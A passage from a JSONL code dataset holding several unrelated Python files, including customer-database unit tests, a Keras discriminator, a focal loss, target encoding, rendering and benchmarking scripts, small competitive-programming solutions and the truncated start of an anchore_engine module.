bo\n\n\nclass BasicOperationsTest(TestCase):\n \"\"\"Testing basic operations\"\"\"\n\n @classmethod\n def setUp(cls):\n \"\"\"Setup database\"\"\"\n cm.DATABASE.drop_tables([cm.Customer])\n cm.DATABASE.create_tables([cm.Customer])\n\n @classmethod\n def tearDown(cls):\n \"\"\"Close database\"\"\"\n cm.DATABASE.close()\n\n def test_add_customer(self):\n \"\"\"Test adding a new customer\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n bo.add_customer('200', 'Iron', 'Man',\n '17801 International Blvd, Seattle, WA 98101',\n '206-787-5388', 'iron.man@gmail.com',\n True, 5000)\n bo.add_customer('300', 'Ramkumar', 'Rajanbabu',\n '7525 166th Ave NE, Redmond, WA 98052',\n '425-556-2900', 'ram.kumar@gmail.com',\n False, 7078)\n\n a_customer_1 = cm.Customer.get(cm.Customer.customer_id == '100')\n self.assertEqual(a_customer_1.customer_id, '100')\n self.assertEqual(a_customer_1.phone_number, '212-576-4000')\n self.assertEqual(a_customer_1.status, True)\n\n a_customer_2 = cm.Customer.get(cm.Customer.customer_id == '200')\n self.assertEqual(a_customer_2.customer_id, '200')\n self.assertEqual(a_customer_2.home_address,\n '17801 International Blvd, Seattle, WA 98101')\n self.assertEqual(a_customer_2.email_address, 'iron.man@gmail.com')\n\n a_customer_3 = cm.Customer.get(cm.Customer.customer_id == '300')\n self.assertEqual(a_customer_3.customer_id, '300')\n self.assertEqual(a_customer_3.status, False)\n self.assertEqual(a_customer_3.credit_limit, 7078)\n\n def test_search_customer(self):\n \"\"\"Test searching for a customer\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 
50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n\n actual = bo.search_customer('100')\n expected = {'first_name': 'Peter', 'last_name': 'Parker',\n 'email_address': 'peter.parker@marvel.com',\n 'phone_number': '212-576-4000'}\n self.assertEqual(actual, expected)\n\n def test_search_customer_fail(self):\n \"\"\"Test searching for a customer (fail)\"\"\"\n actual = bo.search_customer('100') # Not in table\n expected = {}\n self.assertEqual(actual, expected)\n\n def test_delete_customer(self):\n \"\"\"Test deleting a customer\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n\n bo.delete_customer('100')\n actual = bo.search_customer('100')\n expected = {}\n self.assertEqual(actual, expected)\n\n def test_delete_customer_fail(self):\n \"\"\"Test deleting a customer (fail)\"\"\"\n with self.assertRaises(ValueError):\n bo.delete_customer('100') # Not in table\n\n def test_update_customer_credit(self):\n \"\"\"Test updating customer credit limit\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n\n bo.update_customer_credit('100', 2000)\n a_customer = cm.Customer.get(cm.Customer.customer_id == '100')\n actual = a_customer.credit_limit\n expected = 2000\n self.assertEqual(actual, expected)\n\n def test_update_customer_credit_fail(self):\n \"\"\"Test updating customer credit limit (fail)\"\"\"\n with self.assertRaises(ValueError):\n bo.update_customer_credit('100', 2000) # Not in table\n\n def test_list_active_customers(self):\n \"\"\"Test listing active customers\"\"\"\n bo.add_customer(\"100\", \"Peter\", \"Parker\",\n \"135 W. 
50th Street, New York City, NY 10011\",\n \"212-576-4000\", \"peter.parker@marvel.com\",\n True, \"1000.10\")\n\n bo.add_customer(\"200\", \"Iron\", \"Man\",\n \"17801 International Blvd, Seattle, WA 98101\",\n \"206-787-5388\", \"iron.man@gmail.com\",\n True, \"5000\")\n\n bo.add_customer(\"300\", \"Ramkumar\", \"Rajanbabu\",\n \"7525 166th Ave NE, Remond, WA 98052\",\n \"425-556-2900\", \"ram.kumar@gmail.com\",\n False, \"7078.25\")\n\n # Only 2 active customers (2 True)\n self.assertEqual(bo.list_active_customers(), 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"students/ramkumar_rajanbabu/lesson_03/assignment/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357934108","text":"import numpy as np\nimport sys\n\nfrom keras.models import Model\nfrom keras.layers import Input, Conv1D, Reshape, LeakyReLU, BatchNormalization, Flatten, Dense, Conv2D, Dropout\n\n\nclass Discriminator:\n def __init__(self, input_shape):\n self.input_shape = input_shape\n pass\n\n\n def build_discriminator(self, filters, summary=False):\n def conv(layer, f, k_size=4, s_size=2, dropout=0.0, normalize=True):\n c = Conv1D(filters=f,\n kernel_size=k_size,\n strides=s_size,\n padding=\"same\")(layer)\n c = LeakyReLU(alpha=0.2)(c)\n if dropout:\n c = Dropout(dropout)(c)\n\n if normalize:\n c = BatchNormalization()(c)\n return c\n\n input = Input(shape=self.input_shape)\n\n c = Reshape(target_shape=(-1, 1))(input)\n c = conv(c, filters, normalize=False)\n c = conv(c, filters * 2, k_size=3, dropout=0.5)\n c = conv(c, filters * 4, k_size=3, dropout=0.5)\n c = conv(c, filters * 8, k_size=3, dropout=0.5)\n c = Flatten()(c)\n c = Dense(units=128)(c)\n c = LeakyReLU(0.2)(c)\n output = Dense(units=1, activation=\"sigmoid\")(c)\n\n model = Model(inputs=input, outputs=output)\n if summary:\n model.summary()\n\n return model\n\n\nif __name__ == \"__main__\":\n disc = Discriminator(input_shape=(1024 // 2, 2))\n disc.build_discriminator(filters=16, summary=True)\n","sub_path":"discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"155980522","text":"# -*- coding:utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport errno\n\nimport six\nimport yaml\n\nfrom .messaging import die\n\n\ndef safe_load(fp_or_text):\n obj = yaml.safe_load(fp_or_text)\n return all_strs_text(obj)\n\n\ndef load_file_or_die(filename):\n try:\n with open(filename, 'r') as fp:\n return safe_load(fp)\n except IOError as exc:\n if exc.errno == errno.ENOENT:\n die('File does not exist!')\n raise\n\n\ndef save_file(filename, data):\n with open(filename, 'w') as fp:\n save_fp(fp, data)\n\n\ndef save_fp(fp, data):\n yaml.safe_dump(\n data,\n fp,\n allow_unicode=True,\n width=10000,\n )\n\n\ndef all_strs_text(obj):\n \"\"\"\n PyYAML refuses to load strings as 'unicode' on Python 2 - recurse all over\n obj and convert every string.\n \"\"\"\n if isinstance(obj, six.binary_type):\n return obj.decode('utf-8')\n elif isinstance(obj, list):\n return [all_strs_text(x) for x in obj]\n elif isinstance(obj, tuple):\n return tuple(all_strs_text(x) for x in obj)\n elif isinstance(obj, dict):\n return {six.text_type(k): all_strs_text(v) for k, v in six.iteritems(obj)}\n else:\n return 
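A hedged usage sketch for the Discriminator record above — the optimizer and loss are illustrative choices for standard GAN training, not taken from the original file:

from keras.optimizers import Adam

disc = Discriminator(input_shape=(1024 // 2, 2))
model = disc.build_discriminator(filters=16)
model.compile(optimizer=Adam(lr=0.0002, beta_1=0.5),
              loss="binary_crossentropy",
              metrics=["accuracy"])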
obj\n","sub_path":"treehugger/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"376736838","text":"import numpy as np\nimport pandas as pd\n\nclass MTE_one_shot:\n \n def __init__(self, folds, smooth, seed=42):\n self.folds = folds\n self.seed = seed\n self.smooth = smooth\n \n def fit_transform(self, train, x_col, y_col, y_mean=None, out_col = None, out_dtype=None):\n \n self.y_col = y_col\n np.random.seed(self.seed)\n \n if 'fold' not in train.columns:\n fsize = len(train)//self.folds\n train['fold'] = 1\n train['fold'] = train['fold'].cumsum()\n train['fold'] = train['fold']//fsize\n train['fold'] = train['fold']%self.folds\n \n if out_col is None:\n tag = x_col if isinstance(x_col,str) else '_'.join(x_col)\n out_col = f'TE_{tag}_{self.y_col}'\n \n if y_mean is None:\n y_mean = train[y_col].mean()#.compute().astype('float32')\n self.mean = y_mean # mean도 누적해서 바꿔주면 좋을듯\n \n cols = ['fold',x_col] if isinstance(x_col,str) else ['fold']+x_col\n \n agg_each_fold = train.groupby(cols).agg({y_col:['count','sum']}).reset_index()\n agg_each_fold.columns = cols + ['count_y','sum_y']\n \n agg_all = agg_each_fold.groupby(x_col).agg({'count_y':'sum','sum_y':'sum'}).reset_index()\n cols = [x_col] if isinstance(x_col,str) else x_col\n agg_all.columns = cols + ['count_y_all','sum_y_all']\n \n agg_each_fold = agg_each_fold.merge(agg_all,on=x_col,how='left')\n agg_each_fold['count_y_all'] = agg_each_fold['count_y_all'] - agg_each_fold['count_y']\n agg_each_fold['sum_y_all'] = agg_each_fold['sum_y_all'] - agg_each_fold['sum_y']\n agg_each_fold[out_col] = (agg_each_fold['sum_y_all']+self.smooth*self.mean)/(agg_each_fold['count_y_all']+self.smooth)\n agg_each_fold = agg_each_fold.drop(['count_y_all','count_y','sum_y_all','sum_y'],axis=1)\n \n agg_all[out_col] = (agg_all['sum_y_all']+self.smooth*self.mean)/(agg_all['count_y_all']+self.smooth)\n agg_all = agg_all.drop(['count_y_all','sum_y_all'],axis=1)\n \n if hasattr(self, 'agg_all'):\n print('train2')\n self.agg_all = pd.concat([self.agg_all, agg_all])\n \n else:\n print('train1')\n self.agg_all = agg_all\n \n self.agg_all = self.agg_all.drop_duplicates(x_col, keep='last')\n\n train.columns\n cols = ['fold',x_col] if isinstance(x_col,str) else ['fold']+x_col\n train = train.merge(agg_each_fold,on=cols,how='left')\n del agg_each_fold\n \n train[out_col] = train[out_col].fillna(self.mean)\n \n if out_dtype is not None:\n train[out_col] = train[out_col].astype(out_dtype)\n return train\n \n def transform(self, test, x_col, out_col = None, out_dtype=None): \n if out_col is None:\n tag = x_col if isinstance(x_col,str) else '_'.join(x_col)\n out_col = f'TE_{tag}_{self.y_col}'\n test = test.merge(self.agg_all,on=x_col,how='left')\n test[out_col] = test[out_col].fillna(self.mean)\n\n if out_dtype is not None:\n test[out_col] = test[out_col].astype(out_dtype)\n return test","sub_path":"utils/target_encode.py","file_name":"target_encode.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"45475625","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCustom focal loss function for pytorch.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass focal(nn.Module):\n \"\"\"\n Loss function for classification tasks with\n large data imbalance. 
Focal loss (FL) is defined as:\n    FL(p_t) = -alpha*((1-p_t)^gamma)*log(p_t),\n    where p_t = exp(-CE) and CE is the binary cross-entropy loss.\n    For more details, see https://arxiv.org/abs/1708.02002.\n    \"\"\"\n    def __init__(self, alpha=0.5, gamma=2, with_logits=True):\n        \"\"\"\n        Args:\n            alpha (float): \"balance\" coefficient,\n            gamma (float): \"focusing\" parameter (>=0),\n            with_logits (bool): indicates if the sigmoid operation was applied\n            at the end of a neural network's forward path.\n        \"\"\"\n        super(focal, self).__init__()\n        self.alpha = alpha\n        self.gamma = gamma\n        self.logits = with_logits\n\n    def forward(self, images, labels):\n        \"\"\"Calculate focal loss\"\"\"\n        if self.logits:\n            CE_loss = F.binary_cross_entropy_with_logits(images, labels)\n        else:\n            CE_loss = F.binary_cross_entropy(images, labels)\n        pt = torch.exp(-CE_loss)\n        F_loss = self.alpha * (1-pt)**self.gamma * CE_loss\n        return F_loss\n","sub_path":"DefectNet/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497264401","text":"\r\n\r\nimport numpy as np\r\nimport pandas as pd \r\nimport random\r\n\r\nfile = pd.ExcelFile('making_zero_list.xlsx') \r\ndf = file.parse('main') \r\n\r\ndef delete_some_zeros(df,df_out,remove_perc):\r\n    \r\n    zeros_list = df_out ==0\r\n    zero_indices = [] \r\n    count = 0\r\n    \r\n    for i in zeros_list:\r\n        if i == True :\r\n            zero_indices.append(count)\r\n        count += 1\r\n    \r\n    n = round(remove_perc*len(zero_indices))\r\n    drop_indices = random.sample(zero_indices,n) \r\n    df_subset = df.drop(drop_indices)\r\n\r\n    return df_subset\r\n\r\n\r\n#a = delete_some_zeros(df,df['band_gap'],0.8)","sub_path":"delete_some_zeros.py","file_name":"delete_some_zeros.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"369016445","text":"#!/usr/bin/env python3\nimport sys\nimport math\n\ndef solve(P: int):\n    conis = []\n    for i in range(10,0,-1):\n        conis.append(math.factorial(i))\n    ans = 0\n    for i in conis:\n        #print('i=' + str(i))\n        while P - i >= 0:\n            P -= i\n            ans +=1\n            #print(i,P,ans)\n    print(ans)\n    return\n\n\n# Generated by 2.4.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. 
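A hedged usage sketch for the focal loss record above; the batch shape and random labels are arbitrary:

import torch

criterion = focal(alpha=0.5, gamma=2, with_logits=True)
logits = torch.randn(8, 1)                    # raw, pre-sigmoid outputs
labels = torch.randint(0, 2, (8, 1)).float()
print(criterion(logits, labels).item())       # scalar focal loss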
You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n P = int(next(tokens)) # type: int\n solve(P)\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc208/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"318007625","text":"import sys\nsys.path.append('../')\n\nimport os\nimport pickle\nimport shutil\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom py_diff_pd.common.common import create_folder, print_info, ndarray\nfrom py_diff_pd.core.py_diff_pd_core import HexMesh3d\nfrom py_diff_pd.common.display import render_hex_mesh\nfrom py_diff_pd.common.renderer import PbrtRenderer\nfrom py_diff_pd.common.project_path import root_path\nfrom py_diff_pd.common.hex_mesh import hex2obj\n\ndef render_starfish_3d(mesh_folder, img_name):\n # Read mesh.\n mesh = HexMesh3d()\n mesh.Initialize(str(mesh_folder / 'body.bin'))\n\n options = {\n 'file_name': img_name,\n 'resolution': (800, 600),\n 'sample': 512,\n 'max_depth': 3,\n 'light_map': 'uffizi-large.exr',\n 'camera_pos': (0, -1.0, 0.5),\n 'camera_lookat': (0, 0, 0),\n }\n renderer = PbrtRenderer(options)\n renderer.add_hex_mesh(mesh, render_voxel_edge=True, color=(.6, .3, .2),\n transforms=[\n ('s', 0.075),\n ('t', (0, -0.2, 0.1))\n ])\n renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',\n texture_img='chkbd_24_0.7', color='064273')\n renderer.render(verbose=True, nproc=None)\n\ndef render_starfish_actuator(mesh_folder, img_name):\n options = {\n 'file_name': img_name,\n 'resolution': (800, 600),\n 'sample': 512,\n 'max_depth': 3,\n 'light_map': 'uffizi-large.exr',\n 'camera_pos': (0, -1.0, 0.5),\n 'camera_lookat': (0, 0, 0),\n }\n renderer = PbrtRenderer(options)\n\n # Peek muscle numbers.\n muscle_num = 0\n while True:\n f = mesh_folder / 'muscle/{}.obj'.format(muscle_num)\n if not f.exists(): break\n muscle_num += 1\n assert muscle_num >= 0\n for i in range(muscle_num):\n f = mesh_folder / 'muscle/{}.obj'.format(i)\n renderer.add_hex_mesh(str(f), render_voxel_edge=True, texture_img='act.png',\n color=(1, 1, 1),\n transforms=[\n ('s', 0.075),\n ('t', (0, -0.2, 0.1))\n ])\n # Draw wireframe of the body.\n mesh = HexMesh3d()\n mesh.Initialize(str(mesh_folder / 'body.bin'))\n vertices, faces = hex2obj(mesh)\n for f in faces:\n for i in range(4):\n vi = vertices[f[i]]\n vj = vertices[f[(i + 1) % 4]]\n # Draw line vi to vj.\n renderer.add_shape_mesh({\n 'name': 'curve',\n 'point': ndarray([vi, (2 * vi + vj) / 3, (vi + 2 * vj) / 3, vj]),\n 'width': 0.01\n },\n color=(.6, .3, .2),\n transforms=[\n ('s', 0.075),\n ('t', (0, -0.2, 0.1))\n ])\n\n renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',\n texture_img='chkbd_24_0.7', color='064273')\n renderer.render(verbose=True, nproc=None)\n\nif __name__ == '__main__':\n # Download the mesh data from Dropbox and put them in a folder as follows:\n # - starfish_3d\n # - init\n # - ppo\n # - diffpd\n folder = Path('starfish_3d')\n\n for mesh_folder in ['init', 'ppo', 'diffpd']:\n print_info('Processing {}...'.format(mesh_folder))\n render_folder = folder / '{}_render'.format(mesh_folder)\n create_folder(render_folder)\n render_act_folder = folder / '{}_render_act'.format(mesh_folder)\n create_folder(render_act_folder)\n\n # Peek the frame number.\n frame_num = 0\n while True:\n f = folder / mesh_folder / 
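The solve(P) in the AtCoder record above greedily subtracts factorials from 10! down to 1!. Because the while-loop just counts how many times each factorial fits, divmod gives the same answer directly (the sum of P's factoradic digits) — an equivalent sketch, not the original submission:

import math

def min_coins(P):
    ans = 0
    for i in range(10, 0, -1):
        q, P = divmod(P, math.factorial(i))  # q = times i! fits into the remainder
        ans += q
    return ans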
'{}'.format(frame_num)\n if not f.exists(): break\n frame_num += 1\n assert frame_num >= 0\n print_info('{} frames in total.'.format(frame_num))\n\n # Loop over all frames.\n for i in range(frame_num):\n render_starfish_3d(folder / mesh_folder / '{}'.format(i), render_folder / '{:04d}.png'.format(i))\n render_starfish_actuator(folder / mesh_folder / '{}'.format(i), render_act_folder / '{:04d}.png'.format(i))\n","sub_path":"python/example/render_starfish_3d.py","file_name":"render_starfish_3d.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"67489771","text":"\"\"\"\nTests for fitbenchmarking.core.fitting_benchmarking.loop_over_minimizers\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\nimport inspect\nimport os\nimport unittest\n\nfrom fitbenchmarking import mock_problems\nfrom fitbenchmarking.cost_func.nlls_cost_func import NLLSCostFunc\nfrom fitbenchmarking.utils import fitbm_result, output_grabber\nfrom fitbenchmarking.core.fitting_benchmarking import loop_over_minimizers\nfrom fitbenchmarking.parsing.parser_factory import parse_problem_file\nfrom fitbenchmarking.controllers.base_controller import Controller\nfrom fitbenchmarking.utils.options import Options\n\n# Defines the module which we mock out certain function calls for\nFITTING_DIR = \"fitbenchmarking.core.fitting_benchmarking\"\n\n\n# Due to construction of the controllers two folder functions\n# pylint: disable=unnecessary-pass\nclass DummyController(Controller):\n \"\"\"\n Minimal instantiatable subclass of Controller class for testing\n \"\"\"\n\n def __init__(self, cost_func):\n \"\"\"\n Initialize dummy controller\n\n :param cost_func: cost function class\n :type cost_func: CostFunc class\n \"\"\"\n super(DummyController, self).__init__(cost_func)\n self.algorithm_check = {'all': ['deriv_free_algorithm', 'general'],\n 'ls': [None],\n 'deriv_free': ['deriv_free_algorithm'],\n 'general': ['general']}\n self.final_params_expected = [[1, 2, 3, 4], [4, 3, 2, 1]]\n self.flag_expected = [0, 1]\n self.count = 0\n\n def setup(self):\n \"\"\"\n Mock controller setup function\n \"\"\"\n pass\n\n def fit(self):\n \"\"\"\n Mock controller fit function\n \"\"\"\n pass\n\n def jacobian_information(self):\n \"\"\"\n Mock controller jacobian_information function\n \"\"\"\n pass\n\n def cleanup(self):\n \"\"\"\n Mock controller cleanup function\n \"\"\"\n self.final_params = self.final_params_expected[self.count]\n self.flag = self.flag_expected[self.count]\n self.count += 1\n\n\ndef make_cost_function(file_name='cubic.dat', minimizers=None):\n \"\"\"\n Helper function that returns a simple fitting problem\n \"\"\"\n options = Options()\n if minimizers:\n options.minimizers = minimizers\n\n bench_prob_dir = os.path.dirname(inspect.getfile(mock_problems))\n fname = os.path.join(bench_prob_dir, file_name)\n\n fitting_problem = parse_problem_file(fname, options)\n fitting_problem.correct_data()\n cost_func = NLLSCostFunc(fitting_problem)\n return cost_func\n\n\nclass LoopOverMinimizersTests(unittest.TestCase):\n \"\"\"\n loop_over_minimizers tests\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setting up problem for tests\n \"\"\"\n self.minimizers = [\"deriv_free_algorithm\", \"general\"]\n self.cost_func = make_cost_function(minimizers=self.minimizers)\n self.problem = self.cost_func.problem\n self.controller = DummyController(cost_func=self.cost_func)\n self.options = self.problem.options\n self.grabbed_output = 
output_grabber.OutputGrabber(self.options)\n self.controller.parameter_set = 0\n self.count = 0\n self.result_args = {'options': self.options,\n 'cost_func': self.cost_func,\n 'jac': \"jac\",\n 'initial_params': self.problem.starting_values[0],\n 'params': [],\n 'chi_sq': 1}\n\n def mock_func_call(self, *args, **kwargs):\n \"\"\"\n Mock function to be used instead of loop_over_jacobians\n \"\"\"\n results = self.results[self.count]\n minimizer_list = self.minimizer_list[self.count]\n self.count += 1\n return results, self.chi_sq, minimizer_list\n\n def test_run_minimzers_none_selected(self):\n \"\"\"\n Tests that no minimizers are selected\n \"\"\"\n self.options.algorithm_type = \"ls\"\n results_problem, minimizer_failed, new_minimizer_list = \\\n loop_over_minimizers(self.controller, self.minimizers,\n self.options, self.grabbed_output)\n assert results_problem == []\n assert minimizer_failed == self.minimizers\n assert new_minimizer_list == []\n\n @unittest.mock.patch('{}.loop_over_jacobians'.format(FITTING_DIR))\n def test_run_minimzers_selected(self, loop_over_jacobians):\n \"\"\"\n Tests that some minimizers are selected\n \"\"\"\n self.options.algorithm_type = \"general\"\n self.results = [[self.result_args]]\n self.chi_sq = 1\n self.minimizer_list = [[\"general\"]]\n loop_over_jacobians.side_effect = self.mock_func_call\n\n results_problem, minimizer_failed, new_minimizer_list = \\\n loop_over_minimizers(self.controller, self.minimizers,\n self.options, self.grabbed_output)\n assert all(isinstance(x, fitbm_result.FittingResult)\n for x in results_problem)\n assert minimizer_failed == [\"deriv_free_algorithm\"]\n assert new_minimizer_list == [\"general\"]\n\n @unittest.mock.patch('{}.loop_over_jacobians'.format(FITTING_DIR))\n def test_run_minimzers_all(self, loop_over_jacobians):\n \"\"\"\n Tests that all minimizers are selected\n \"\"\"\n self.results = [[self.result_args], [self.result_args]]\n self.chi_sq = [1]\n self.minimizer_list = [[\"general\"], [\"deriv_free_algorithm\"]]\n loop_over_jacobians.side_effect = self.mock_func_call\n\n results_problem, minimizer_failed, new_minimizer_list = \\\n loop_over_minimizers(self.controller, self.minimizers,\n self.options, self.grabbed_output)\n assert all(isinstance(x, fitbm_result.FittingResult)\n for x in results_problem)\n assert minimizer_failed == []\n assert new_minimizer_list == [\"general\", \"deriv_free_algorithm\"]\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"fitbenchmarking/core/tests/test_fitting_benchmarking_minimizers.py","file_name":"test_fitting_benchmarking_minimizers.py","file_ext":"py","file_size_in_byte":6105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"319049165","text":"import os\nimport math\n\n\ndef kAncestor(g, queries, root):\n n = len(g) - 1\n adj = {v: [] for v in range(n)}\n h, tree = [0] * n, [[0 for j in range(20)] for i in range(n + 1)]\n\n def dfs(u, p):\n for v in adj[u]:\n if v == p:\n continue\n h[v] = h[u] + 1\n for j in range(20):\n if j == 0:\n tree[v][j] = u\n else:\n if tree[v][j - 1] == 0:\n break\n else:\n tree[v][j] = tree[tree[v][j - 1]][j - 1]\n dfs(v, u)\n\n dfs(root, 0)\n ans = []\n for t, x, y in queries:\n pass\n return ans\n\n\nif __name__ == '__main__':\n t = int(input().strip())\n for _ in range(t):\n n = int(input().strip())\n g = {i: [] for i in range(1, n + 1)}\n root = None\n for _ in range(n):\n x, y = map(int, input().strip().split(\" \"))\n if y == 0:\n root = x\n else:\n g[x].append(y)\n 
g[y].append(x)\n Q = int(input().strip())\n queries = []\n for _ in queries:\n queries.append(map(int, input().strip().split(\" \")))\n res = kAncestor(g, queries)\n for x in res:\n print(x)\n","sub_path":"hackerank/2022/advance/kth-ancestor.py","file_name":"kth-ancestor.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"398065235","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ._config import config\n\n\n__all__ = ['color_mapper', 'colors_from_cmap', 'cycle_cmap']\n\n\nCMAP_RANGE = config['color']['cmap_range']\n\n\ndef color_mapper(parameter_range, cmap=None, start=None, stop=None):\n \"\"\"Return color mapper, which returns color based on parameter value.\n\n Parameters\n ----------\n parameter_range : tuple of floats\n Minimum and maximum value of parameter.\n\n cmap : str or colormap\n A matplotlib colormap (see matplotlib.pyplot.cm) or the name of one.\n\n start, stop: 0 <= float <= 1\n Limit colormap to this range (start < stop 1). You should limit the\n range of colormaps with light values (assuming a white background).\n\n Returns\n -------\n map_color : function\n Function that returns an RGBA color from a parameter value.\n\n \"\"\"\n if cmap is None:\n cmap = config['color']['cmap']\n if isinstance(cmap, basestring):\n cmap = getattr(plt.cm, cmap)\n\n crange = list(CMAP_RANGE.get(cmap.name, (0, 1)))\n if start is None:\n start = crange[0]\n if stop is None:\n stop = crange[1]\n\n assert 0 <= start <= 1\n assert 0 <= stop <= 1\n\n pmin, pmax = parameter_range\n def map_color(val):\n \"\"\"Return color based on parameter value `val`.\"\"\"\n assert pmin <= val <= pmax\n val_norm = (val - pmin) * float(stop - start) / (pmax - pmin)\n idx = val_norm + start\n return cmap(idx)\n\n return map_color\n\n\ndef colors_from_cmap(length=50, cmap=None, start=None, stop=None):\n \"\"\"Return color cycle from a given colormap.\n\n Parameters\n ----------\n length : int\n The number of colors in the cycle. When `length` is large (> ~10), it\n is difficult to distinguish between successive lines because successive\n colors are very similar.\n\n cmap : str\n Name of a matplotlib colormap (see matplotlib.pyplot.cm).\n\n start, stop: 0 <= float <= 1\n Limit colormap to this range (start < stop 1). You should limit the\n range of colormaps with light values (assuming a white background).\n Some colors have default start/stop values (see `CMAP_RANGE`).\n\n Returns\n -------\n colors : list\n List of RGBA colors.\n\n See Also\n --------\n cycle_cmap\n\n \"\"\"\n if cmap is None:\n cmap = config['color']['cmap']\n if isinstance(cmap, basestring):\n cmap = getattr(plt.cm, cmap)\n\n crange = CMAP_RANGE.get(cmap.name, (0, 1))\n if start is not None:\n crange[0] = start\n if stop is not None:\n crange[1] = stop\n\n assert 0 <= crange[0] <= 1\n assert 0 <= crange[1] <= 1\n\n idx = np.linspace(crange[0], crange[1], num=length)\n return cmap(idx)\n\n\ndef cycle_cmap(length=50, cmap=None, start=None, stop=None, ax=None):\n \"\"\"Set default color cycle of matplotlib based on colormap.\n\n Note that the default color cycle is **not changed** if `ax` parameter\n is set; only the axes's color cycle will be changed.\n\n Parameters\n ----------\n length : int\n The number of colors in the cycle. 
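The kAncestor record above builds the binary-lifting table (tree[v][j] = the 2^j-th ancestor of v, with 0 as the "missing" sentinel) but leaves the query loop as pass. A k-th ancestor lookup over that table walks the set bits of k — a hypothetical helper consistent with the record's conventions:

def kth_ancestor(tree, node, k):
    for j in range(20):
        if k & (1 << j):
            node = tree[node][j]
            if node == 0:
                break  # fewer than k ancestors exist
    return node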
When `length` is large (> ~10), it\n is difficult to distinguish between successive lines because successive\n colors are very similar.\n\n cmap : str\n Name of a matplotlib colormap (see matplotlib.pyplot.cm).\n\n start, stop: 0 <= float <= 1\n Limit colormap to this range (start < stop 1). You should limit the\n range of colormaps with light values (assuming a white background).\n Some colors have default start/stop values (see `CMAP_RANGE`).\n\n ax : matplotlib axes\n If ax is not None, then change the axes's color cycle instead of the\n default color cycle.\n\n See Also\n --------\n colors_from_cmap, color_mapper\n\n \"\"\"\n color_cycle = colors_from_cmap(length, cmap, start, stop)\n\n if ax is None:\n plt.rc('axes', color_cycle=color_cycle.tolist())\n else:\n ax.set_color_cycle(color_cycle)\n\n","sub_path":"mpltools/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"272846103","text":"import json\nimport re\nimport copy\nimport time\nimport base64\nimport hashlib\n\n# anchore modules\nimport anchore_engine.configuration.localconfig\nimport anchore_engine.utils\n\nfrom anchore_engine import db\nfrom anchore_engine.db import db_users\nfrom anchore_engine.subsys import logger\nfrom anchore_engine.clients.policy_engine.generated.models import ImageIngressRequest\nfrom anchore_engine.clients import docker_registry\nfrom anchore_engine.auth import anchore_resources\n\n\nsubscription_types = ['policy_eval', 'tag_update', 'vuln_update', 'repo_update', 'analysis_update']\nresource_types = ['registries', 'users', 'images', 'policies', 'evaluations', 'subscriptions', 'archive']\nbucket_types = [\"analysis_data\", \"policy_bundles\", \"policy_evaluations\", \"query_data\", \"vulnerability_scan\", \"image_content_data\", \"manifest_data\"]\nsuper_users = ['admin', 'anchore-system']\nimage_content_types = ['os', 'files', 'npm', 'gem', 'python', 'java']\nimage_metadata_types = ['manifest', 'docker_history', 'dockerfile']\nimage_vulnerability_types = ['os', 'non-os']\nos_package_types = ['rpm', 'dpkg', 'APKG']\nnonos_package_types = ['java', 'python', 'npm', 'gem', 'maven', 'js']\n\n\ndef do_simple_pagination(input_items, page=1, limit=None, dosort=True, sortfunc=lambda x: x, query_digest=\"\", ttl=0.0):\n page = int(page)\n next_page = None\n if not limit:\n return(1, None, input_items)\n\n limit = 